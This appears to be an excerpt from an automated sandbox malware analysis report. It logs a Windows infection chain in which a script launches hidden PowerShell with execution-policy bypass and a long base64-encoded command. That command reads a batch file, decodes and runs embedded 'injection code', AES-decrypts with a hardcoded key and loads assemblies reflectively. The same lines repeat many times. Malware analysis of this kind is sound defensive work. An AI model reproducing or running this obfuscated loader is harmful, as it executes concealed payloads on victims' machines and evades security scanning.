Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\WordDoc.bat", "1", "true");

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly($asmName, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $modBuilder = $asmBuilder.DefineDynamicModule('DynModule', $false) $typeBuilder = $modBuilder
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
